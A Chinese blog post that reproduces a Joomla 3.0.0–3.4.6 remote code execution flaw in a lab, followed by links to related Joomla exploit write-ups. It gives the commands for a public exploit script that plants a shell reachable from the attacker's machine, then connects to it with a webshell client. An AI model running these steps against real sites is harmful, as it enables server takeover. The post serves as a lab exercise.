Joomla 3.0.0 -3.4.6远程代码执行漏洞复现

最新推荐文章于 2024-02-20 11:46:21 发布
最新推荐文章于 2024-02-20 11:46:21 发布
阅读量602 收藏 1
点赞数
分类专栏: Web渗透 CMS 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37777713/article/details/104064628
版权

目录

漏洞概述

2019年10月2日,意大利安全公司 Hacktive Security的研究员 AlessandroGroppo 公开了影响 Joomla 内容管理系统老旧版本 3.0.0 至 3.4.6 (在2012年9月末至2015年12月中旬发布)的0day 详情。漏洞本质是Joomla对session数据处理不当,未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,获取服务器权限,实现远程命令执行。它尚不存在 CVE 编号且易于利用,类似于 CVE-2015-8562。

漏洞影响版本

Joomla 3.0.0-3.4.6

复现环境

1、 Joomla 3.4.6
下载地址:https://downloads.joomla.org/cms/joomla3/3-4-6
2、靶机:win7(PHPStudy环境搭建)
攻击主机:kali2019

复现过程

1、将Joomla解压后,放入phpStudy\PHPTutorial\WWW下面在这里插入图片描述

2、访问http://xxx.xxx.xxx.xxx/Joomla后开始创建Joomla

在这里插入图片描述在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述
至此,Joomla已经安装完成。

3、下载脚本并进行检测该版本的Joomla是否有漏洞(出现Vulnerable则说明有漏洞)
下载地址:https://github.com/kiks7/rusty_joomla_rce

python3 joomla3.4.6-rce.py -t  http://靶机IP/Joomla/

在这里插入图片描述
结果显示该版本的Joomla确实有漏洞。

4、 利用脚本生成EXP进行攻击

python3 joomla3.4.6-rce.py -t  http://靶机IP/Joomla/ --exploit --lhost kali的IP --lport kali空闲端口

在这里插入图片描述
5、我们在靶机查看configuration.php
在这里插入图片描述
6、我们拿蚁剑进行连接
在这里插入图片描述
成功连接。至此,复现完成。

修复建议

将Joomla在官网上升级至最新版本。

柒玥弯
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2023-23752:Joomla未授权访问漏洞复现
薛定谔嘚喵博客
09-01 1582
Joomla是一个免费的开源内容管理系统(CMS),允许用户构建网站和在线应用程序。它于 2005 年首次发布,此后成为最受欢迎的 CMS 平台之一,为全球数百万个网站提供支持。 在 Joomla! 4.0.0 到 4.2.7 中发现了一个问题。不正确地访问检查允许对 Web 服务终结点进行未经授权的访问。
(CVE-2020-10238)Joomla远程代码执行
m0_55563900的博客
04-17 981
一、实验介绍 1.基本概念 Joomla!是美国Open Source Matters团队的一套使用PHP和MySQL开发的开源、跨平台的内容管理系统(CMS)。Joomla是一套内容管理系统,是使用PHP语言加上MYSQL数据库所开发的软件系统。 2.影响版本 Joomla <= 3.9.15 二、实验目的 1.掌握漏洞产生的原理 2.了解漏洞影响版本 3.熟悉漏洞的修复方式 三、实验步骤 1.启动靶场查看实验环境; 2.下载执行脚本; 3.运行exp; 4.进行访问shell. 四、修复
Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现与分析(序列化与反序列化简单理解)
不想当脚本小子的脚本小子
12-24 892
Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现与分析 一、漏洞描述 Joomla是一套内容管理系统,是使用PHP语言加上MYSQL数据库所开发的软件系统,最新版本为3.9.12,官网: https://downloads.joomla.org/,漏洞位于根目录下的configuration.php,由于该CMS对函数过滤不严格,导致了远程代码执行漏洞,该漏洞可能导致服务器被入侵、信息泄露等严重风险。 代码执行漏洞也叫代码注入漏洞,指用户通过浏览器提交执行恶意脚本代码执行恶意构造的.
Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现
kkkkk0826的专栏
10-13 667
Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现 一、漏洞描述 Joomla是一套内容管理系统,是使用PHP语言加上MYSQL 数据库所开发的软件系统,最新版本为3.9.12,官网: https://downloads.joomla.org/,漏洞位于根目录下的configuration.php,由于该CMS对函数过滤不严格,导致了远程代码执行漏洞,该漏洞可能导致服务器被...
Joomla![1.5-3.4.5]反序列化远程代码执行EXP(直接写shell)
weixin_33881753的博客
02-16 513
Usage:x.py http://xxx.com # coding=utf-8# author:KuuKi# Help: joomla 1.5-3.4.5 unserialize remote code executionimport urllib2import cookielib,syscj = cookielib.CookieJar()opener = urllib2.build_open...
Joomla3.0.0-3.4.6远程代码执行RCE
小石头的博客
07-02 644
一、环境准备 Joomla3.4.6下载地址:https://downloads.joomla.org/cms/joomla3/3-4-6 环境搭建:使用phpstudy即可 提前创建数据库 安装完删除installation文件夹即可成功 二、漏洞复现 1、使用脚本验证漏洞是否存在 使用脚本前先安装脚本所需的模块 pip3 install bs4 pip3 install colorama pip3 install termcolor 运行python3
Joomla 3.4.6 远程代码执行漏洞复现
0nc3的博客
10-11 910
0x00 CMS简介 Joomla!是一套全球知名的内容管理系统。 Joomla!是使用PHP语言加上MySQL数据库所开发的软件系统,目前最新版本是3.9.11 。可以在Linux、 Windows、MacOSX等各种不同的平台上执行。目前是由Open Source Matter这个开放源码组织进行开发与支持,这个组织的成员来自全世界各地,小组成员约有150人,包含了开发者、设计者、系统管理者、...
Joomla-3.4.6远程代码执行漏洞复现
yi_jin_ke_tang的博客
02-15 1033
#01 Joomla简介 Joomla!是一套自由、开放源代码的内容管理系统,以PHP撰写,用于发布内容在万维网与内部网,通常被用来搭建商业网站、个人博客、信息管理系统、Web 服务等,还可以进行二次开发以扩充使用范围。目前最新版本3.9.11,Joomla!是一套自由的开源软件,使用GPL授权,任何人随时都能下载 Joomla! 并使用。 #02 漏洞简介 在exploit-db( https:...
Joomla 3.4.6 远程代码执行漏洞复现(超详细超简单o嘻嘻)
2301_76467680的博客
06-29 417
下载解压后放入wamp/www/Joomla或者phpstudy/PHPTutorial/WWW/Joomla/目录下,访问。然后根据提示删除安装目录即可。然后点击下一步点击安装。至此,环境搭建完毕。
【Vulfocus解题复现joomla 远程代码执行 (CVE-2021-23132)
温氏效应
11-23 5169
Joomla是一套知名的内容管理系统,其使用PHP语言和 MySQL数据库开发,可以在Linux、 Windows、MacOSX等各种不同的平台上运行 Joomla官方发布安全公告,修复了Joomla中的一个远程代码执行漏洞(CVE-2021-23132),其CVSSv3评分为7.5。由于Joomla com_media模块对上传文件校验不严格,攻击者可以通过上传恶意文件,从而实现远程代码执行
Joomla远程代码执行(CVE-2021-23132)
最新发布
m0_65150886的博客
02-20 739
后台路径:/administrator 超级管理员:superadmin:123456 普通管理员:admin:123456。显示成功登录超级管理员账号后,创建了普通管理员,并更改了默认路径,实现了目录遍历这一步,之后删除了config.xml文件,又成功上传了新的config.xml文件,并赋予hk用户超级管理员权限。),添加完成后,点击上面的Save 保存页面。13.访问error.php文件,可看到空白页面,证明漏洞复现成功了。1.访问http://ip:port,出现如下页面,开始实验。
Joomla 3.4.6 Remote Code Execution漏洞复现
ranuy阮的博客
10-09 3042
0x00.Joomla介绍 Joomla!是一套全球知名的内容管理系统。 Joomla!是使用PHP语言加上MySQL数据库所开发的软件系统,目前最新版本是3.9.11 。可以在Linux、 Windows、MacOSX等各种不同的平台上执行。目前是由Open Source Matter这个开放源码组织进行开发与支持,这个组织的成员来自全世界各地,小组成员约有150人,包含了开发者、设计者、系...
Joomla远程代码执行漏洞分析
stonesharp的专栏
12-19 4116
说一下这个漏洞的影响和触发、利用方法。这个漏洞影响Joomla 1.5 to 3.4全版本,并且利用漏洞无需登录,只需要发送两次数据包即可(第一次:将session插入数据库中,第二次发送同样的数据包来取出session、触发漏洞执行任意代码),后果是直接导致任意代码执行。 0x00 漏洞点 —— 反序列化session 这个漏洞存在于反序列化session的过程中。 漏洞
Joomla目录遍历及远程代码(CVE-2021-23132)--避坑指南
huayimy的博客
01-11 933
Joomla目录遍历及远程代码(CVE-2021-23132)--避坑指南,脚本复现,在线靶场,版本,phpinfo(),添加webshell添加一句话木马
joomla CMS后台另类拿WebShell方法
fengling132的专栏
08-15 2785
漏洞概要关注数(0) 关注此漏洞 缺陷编号: WooYun-2011-02640 漏洞标题: joomla CMS后台另类拿WebShell方法 相关厂商: joomla CMS 漏洞作者: akacd 提交时间: 2011-08-07 公开时间: 2011-08-07 漏洞类型: 命令执行 危害等级: 中 自评Rank: 7
漏洞复现Joomla远程代码执行(RCE)
cj_Hydra's Blog
11-12 930
前言: Joomla是一套内容管理系统,是使用PHP语言加上MySQL数据库所开发的软件系统,最新版本为3.9.11,可以在Linux、Windows、MacOSX等各种不同的平台上执行,在CMS评测中获得“最佳开源CMS”奖! 漏洞位于根目录下的configuration.php ,漏洞相关poc已在互联网公开,采用Joomla并存在漏洞的服务器已处于危险之中。 影响版本: Joomla 3.0.0-3.4.6 复现过程: 第一步:下载源码进行环境搭建 https://downloads.joomla.o
Joomla漏洞
热门推荐
Grey的博客
07-09 1万+
开始复现漏洞
Joomla注入漏洞(CVE-2018-6605)复现分析
3569
04-18 2442
https://mp.weixin.qq.com/s?__biz=MzAxODg1MDMwOQ==&amp;mid=2247489109&amp;idx=1&amp;sn=0c9a3388e4ac1389897b4449fb3af110&amp;chksm=9bcea13facb928293ac06fede04f15d564b60a5e8ad26208f28ebe175017aa3d2144617...
joomla漏洞_Joomla关键零日漏洞远程命令执行漏洞
culin0274的博客
08-11 209
joomla漏洞 CVE编号:CVE​​-2015-8562 (CVE Numbers: CVE-2015-8562) A recently discoveredzero day vulnerability within Joomlais currently being actively exploited, thisvulnerabilityallowsan attackerto t...
简明易懂的Joomla1.5中文教程-网站搭建指南
"Joomla 1.5使用教程 - 中文手册"是一本详尽的介绍如何使用Joomla 1.5搭建网站的书籍。它涵盖了Joomla 1.5的各个方面,从安装和配置到创建内容和管理用户,再到使用模块和插件扩展网站功能。通过这本书,读者可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值